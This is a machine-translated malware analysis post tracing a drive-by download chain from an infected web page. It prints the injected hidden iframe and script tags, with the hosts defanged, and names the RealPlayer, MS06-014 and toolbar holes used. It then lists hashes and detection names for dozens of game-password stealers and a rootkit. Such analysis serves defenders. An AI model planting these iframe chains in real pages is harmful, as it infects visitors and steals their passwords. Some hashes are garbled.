Trojan. win32.killav, Trojan. psw. win32.qqpass, rootkit. win32.mnless, etc.

Trojan. win32.killav, Trojan. psw. win32.qqpass, rootkit. win32.mnless, etc.

Original endurer
1st-04-03

The website page contains code:
/---
<IFRAME src = "hxxp: // www. t **-T ** o * u *. CN/ping.html "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

#1 hxxp: // www. t **-T ** o * u *. CN/ping.html contains the Code:
/---
<IFRAME src = hxxp: // ** A.1 ** 5 * 8d * m **. com/b3.htm? 001 width = 0 Height = 0> </iframe>
---/

#1.1 hxxp: // ** A.1 ** 5 * 8d * m **. com/b3.htm? 001 contains code:
/---
<Script language = JavaScript src = hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/OK. js> </SCRIPT>
<IFRAME src = hxxp: // * B *. 1 ** 5 * 8d * m **. COM/One/OK .htm width = 1 Height = 1 border = 1> </iframe>
---/

#1.1.1 hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/OK. js

Use the rmoc3260.dll (CLSID: 2f542a2e-edc9-4bf7-8cb1-87c9919f7f93) Vulnerability of RealPlayer to download hxxp: // * C **. 1 ** 5 * 8d * m **. com/OK .exe

File Description: D:/test/OK .exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17552 bytes, 17.144 KB
MD5: 5sp_70021acab5e000c4dfff29cd451c
Sha1: 578dfdebf168e049a3ab802c832636488a2f0456
CRC32: 4b9edaef

The Kaspersky report is Trojan. win32.killav. QE, and the rising report is Trojan. win32.undef. EFZ.

OK .exe uses image hijacking/ifeo, shellexecutehook, and other technologies to prevent anti-virus software from starting and download hxxp: // * C **. 1 ** 5 * 8d * m **. the file specified in COM/OK .txt.

File Description: D:/test/ao.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:26:30
Size: 78686 bytes, 76.862 KB
MD5: 89f3ee2e22bbd8b266a293f5166fc17a
Sha1: 281693777e23dabf78d8008762b37afe40da7a55
CRC32: d398c5b0

Kaspersky reported Trojan. win32.agent. jfx [KLAB-4526233]

File Description: D:/test/a1.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:26:30
Size: 22776 bytes, 22.248 KB
MD5: 24b7771b9e1afb8b449213515682a17a
Sha1: c10e5f88214d5d59dc2513d531973c28ebab0434
CRC32: a9249d9a

Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a2.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 21079 bytes, 20.599 KB
MD5: 702b5959df5bd296f76597fa64143831
Sha1: 34ec9f5cbb7e68b83d02780725213701767e1cf7
CRC32: 7f3dfe3b

Kaspersky reports Trojan-PSW.Win32.OnLineGames.ymj, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a3.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:47:26
Size: 20468 bytes, 19.1012 KB
MD5: 8a7f7d39b47919e70901_df5b24ac4d
Sha1: f0f0cb79c124f768252ffef92ac8a5eb91d9d079
CRC32: cbca1fad

The rising star report is Trojan. psw. win32.gameol. gen.

File Description: D:/test/a4.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19632 bytes, 19.176 KB
MD5: 642aa45bd05212683008e2798f9cb2f8
Sha1: 422ec027bddf7c5bd8a535b4dc7aa2cc1_defb1
CRC32: ff9d839b

The error message "Trojan. psw. win32.gameol. MTA" is reported by rising.

File Description: D:/test/a5.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14972 bytes, 14.636 KB
MD5: b893b68b3ebd8f5e2c0f07c3de4e55f9
Sha1: 439597aff3785fab138b00de716f202cf8fc0d69
CRC32: 97dd3497

Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a6.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19924 bytes, 19.468 KB
MD5: 913ccd2b2828423a0929a706f199908e
Sha1: 4b0e66b96a5db16a8c358447bc6688a47178fe13
CRC32: 4dfa63f5

Rising Star reported rootkit. win32.mnless. La

File Description: D:/test/a7.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14568 bytes, 14.232 KB
MD5: 4f781b24439d8c74803735820a51cb36
Sha1: 2a127fdd247d187dfb7ee71e675657c8b121c229
CRC32: 0ccc1ae2

Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a8.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19939 bytes, 19.483 KB
MD5: 3be779060716d94062c0d7dd870b730a
Sha1: 08145bc24b2a4853b37eb89d562133f09853174d
CRC32: 93a08250

Kaspersky reports Trojan-PSW.Win32.OnLineGames.wjm, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a9.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17908 bytes, 17.500 KB
MD5: 4a9c60c56a45513871e66a1eb3a7c567
Sha1: bd85c7495e9fa41095bc623ed5b2f8df92dc2df2
CRC32: f1fe083d

Kaspersky reports Trojan-Downloader.Win32.Zlob.geg, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a10.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19363 bytes, 18.931 KB
MD5: ce5c37b3e404229d91fb5cb64c5e0889
Sha1: f433a2d216a1ba9dfb3ac960f8b22d12f334b5ef
CRC32: a8565a23

Kaspersky reports Trojan-PSW.Win32.OnLineGames.vlp, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a11.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19724 bytes, 19.268 KB
MD5: b3ac229ffcac4f802f9cbb01bb02087a
Sha1: ca9e7476acd9ea1ea4732c5d231501bf056f2c6
CRC32: 856092b1

The rising star report is Trojan. psw. win32.gameol. gen.

File Description: D:/test/a12.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19756 bytes, 19.300 KB
MD5: 7975719e767a35e55554293477838238
Sha1: d148aef2bfe2bbc49b1fdcc9a71e179b6b086f7c
CRC32: c17a2595

Kaspersky reports Trojan-PSW.Win32.OnLineGames.usl, rising reports Trojan. psw. win32.gameol. MNP

A13.exe failed to download

File Description: D:/test/a14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19278 bytes, 18.846 KB
MD5: dca0c58d2158eb2fdfcbf373bbe36e19
Sha1: 587981c29a8b5fbdd53a1c68340a89080a4564dc
CRC32: 44f05cc4

Kaspersky reports Trojan-PSW.Win32.OnLineGames.uff, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a15.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19711 bytes, 19.255 KB
MD5: 23bd8fd302d6ddb0857f5f6cb0c3ce67
Sha1: a5a21c15ccc4bb7a5e0be5c4802c28e69486f0cc
CRC32: 255.d25e9

Kaspersky reports Trojan-PSW.Win32.OnLineGames.wpa, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a16.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19207 bytes, 18.775 KB
MD5: 69e5f34e26384573f64218a2b128953f
Sha1: cdc3cd20c7c8e555358328f1dbec97715ae550c4
CRC32: cbfcbe1b

Kaspersky reports Trojan-PSW.Win32.OnLineGames.ucj, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a17.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17344 bytes, 16.960 KB
MD5: 08f21d970af5864e8c5808c147da9aea
Sha1: 51d128c9689363913fcbbb0a909ee2f196688dd1
CRC32: 5a962297

Kaspersky reported as Trojan-PSW.Win32.OnLineGames.yut, rising as rootkit. win32.mnless. La

File Description: D:/test/a18.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14376 bytes, 14.40 KB
MD5: dbca31108a6f14db776b1ff862ecc30a
Sha1: d85b565670c980ba6ca73f8c2fd1ba9b5c1cd8e7
CRC32: bfffb79a

Rising Star reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a19.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 33419 bytes, 32.651 KB
MD5: 7542020c6141918e8f0c8058c456e66a
Sha1: 3ca9ced11cf1ca869e9dbdfe60af9cf1422c294c
CRC32: bea7fc10

Kaspersky for Trojan-PSW.Win32.QQPass.bmd, rising for Trojan. psw. win32.qqpass. zfa

File Description: D:/test/a20.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 16963 bytes, 16.579 KB
MD5: 02de1cd1ddacc63a71c30e5bdcc4ad4d
Sha1: 9b32a3db1d6f63cffcfd768ff2b1128d7d98110a
CRC32: 63a5d8f6

The rising star report is Trojan. psw. win32.gameol. gen.

File Description: D:/test/a21.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14624 bytes, 14.288 KB
MD5: d3fada2b4c9a447e57838076bf1540c5
Sha1: 6663ee2437770cba7222cb111b88a6e250af00b4
CRC32: 8e5984ee

Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a22.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 14116 bytes, 13.804 KB
MD5: d50a1deabba26f48a1ebcf101ffc68a9
Sha1: c39a8562463b1a5a74edc7ac0f1c5d954a6f666a
CRC32: 159e2390

Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a23.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 20264 bytes, 19.808 KB
MD5: a1sp_81a8061fc0c0ebc4c7d4d764126
Sha1: b1656dbb1c6d1af14694c5925d5b8cb454ef6b22
CRC32: 526c5bdc

Kaspersky reports Trojan-PSW.Win32.OnLineGames.wfb, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a24.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 14784 bytes, 14.448 KB
MD5: 6fda-bca0e1629a4cf0b5eec89b5f7ac
Sha1: 2f8d1c40b520bbc14bc210e7b40f6bb2cf7ce203
CRC32: 7b352family

Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a25.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 13972 bytes, 13.660 KB
MD5: 21bb9e1eba6588de8595a2309a81d19d
Sha1: baed94795612ec633f0d45303de5fe710682b6f1
CRC32: 7a169f5f

Kaspersky for Trojan-PSW.Win32.OnLineGames.whs, rising for Trojan. psw. win32.gameol. MSS

File Description: D:/test/a26.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:11
Modification time: 14:28:11
Access time:
Size: 29613 bytes, 28.941 KB
MD5: d2a5792a249763d45e10fababfb624f9
Sha1: 6a01c4b11f587325c5a6e68849cd4d9d711e208e
CRC32: 7119f971

Kaspersky reports Trojan-PSW.Win32.Lmir.bpv, rising reports Trojan. psw. win32.gamesonline. FZ

A27.exe failed to download

File Description: D:/test/a28.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:11
Modification time: 14:28:12
Access time:
Size: 14856 bytes, 14.520 KB
MD5: 1370394482e46fc35eceb6dda7728cc6
Sha1: fa0151af6685adbf4d5a87ce685f63615206de4d
CRC32: 60ff2aa7

Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, rising reports Trojan. psw. win32.gameol. mjf

File Description: D:/test/a29.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:12
Modification time: 14:28:12
Access time:
Size: 17318 bytes, 16.934 KB
MD5: d00d9aab855309712a6ef4fc8730951b
Sha1: 87671c6ed6e13b68b8810ca48646ee333cde946b
CRC32: 41189142

Kaspersky reports Trojan-PSW.Win32.OnLineGames.xjn, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a30.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:12
Modification time: 14:28:13
Access time:
Size: 17188 bytes, 16.804 KB
MD5: f10a6e968e72080f02eb60c4146ddbbd
Sha1: e2525b7f75e8f4860ff3bb09ced7292c111cc3c1
CRC32: 66ec0f6c

Kaspersky reports Trojan-PSW.Win32.OnLineGames.ymv, rising reports Trojan. psw. win32.gameol. gen

File Description: D:/test/a31.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:13
Modification time: 14:28:13
Access time:
Size: 15132 bytes, 14.796 KB
MD5: c9e920a1a62a58f1ce99d7ef31d9bd0c
Sha1: 3b0f42e272fa99417b04401c82796202d8b14d36
CRC32: de7a9b7a

Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, rising reports Trojan. psw. win32.gameol. mjf

A32.exe cannot be downloaded

File Description: D:/test/a33.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:13
Modification time: 14:28:14
Access time:
Size: 20128 bytes, 19.672 KB
MD5: c5e2c08165f17d949b1bac0523f63444
Sha1: a827f6c90937df75b8b33d9db5599c2aae0969b7
CRC32: 5834455e

Kaspersky reports Trojan-PSW.Win32.OnLineGames.yuu, rising reports Trojan. psw. win32.xyonline. ACG

File Description: D:/test/a34.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:14
Modification time: 14:28:14
Access time:
Size: 17440 bytes, 17.32 KB
MD5: f1dcb41a1edea089aeba5a15a4b9286f
Sha1: 58fd2a0a8581dba2afb290271acaf9d94bcc2f3a
CRC32: ee164f46

Kaspersky reported as Trojan-PSW.Win32.OnLineGames.ysl, rising as rootkit. win32.mnless. La

File Description: D:/test/avp.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:15
Modification time: 14:28:15
Access time:
Size: 43136 bytes, 42.128 KB
MD5: 1276b927abdf9f15a76141e86f473774
Sha1: e198b37ee0fe40478785b22c550974f1e709a71f
CRC32: 932eb6b8

Kaspersky reports Trojan-PSW.Win32.OnLineGames.uvg, rising reports Trojan. win32.undef. efx

File Description: D:/test/oko.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:14
Modification time: 14:28:14
Access time:
Size: 1024 bytes, 1.0 kb
MD5: f2bf82138d664f6826be8fc485421361
Sha1: 92af88aced0d804237464904541024c25236824b
CRC32: e1352b66

The report of Rising Star is Trojan. win32.undef. efx.

#1.1.2 hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/OK .htm contains the Code:
/---
<Script language = "JavaScript">
Eval ("/151/146/50/144/157/143/165" + "/155 /... (Omitted )... /12/175 ")
</SCRIPT>
---/
Check the cookie variable OK and output the Code:
/---
<SCRIPT src = hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/14.js> </SCRIPT>
<SCRIPT src = hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/RL. js> </SCRIPT>
<SCRIPT src = hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/LZ. js> </SCRIPT>
---/

#1.1.2.1 hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/14.js
Download hxxp: // * C **. 1 ** 5 * 8d * m **. com/OK .exe with MS06-014 Vulnerability

#1.1.2.2 hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/RL. js

Use the RealPlayer (ierpctl. ierpctl.1) vulnerability to download hxxp: // * C **. 1 ** 5 * 8d * m **. com/OK .exe

#1.1.2.3 hxxp: // * B *. 1 ** 5 * 8d * m **. com/One/LZ. js

Download hxxp: // * C **. 1 ** 5 * 8d * m **. com/OK .exe with the vulnerability CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20.

#1.1.2.4 use baidubar. tool to download hxxp: // * C **. 1 ** 5 * 8d * m **. com/Baidu. Cab, which contains new.exe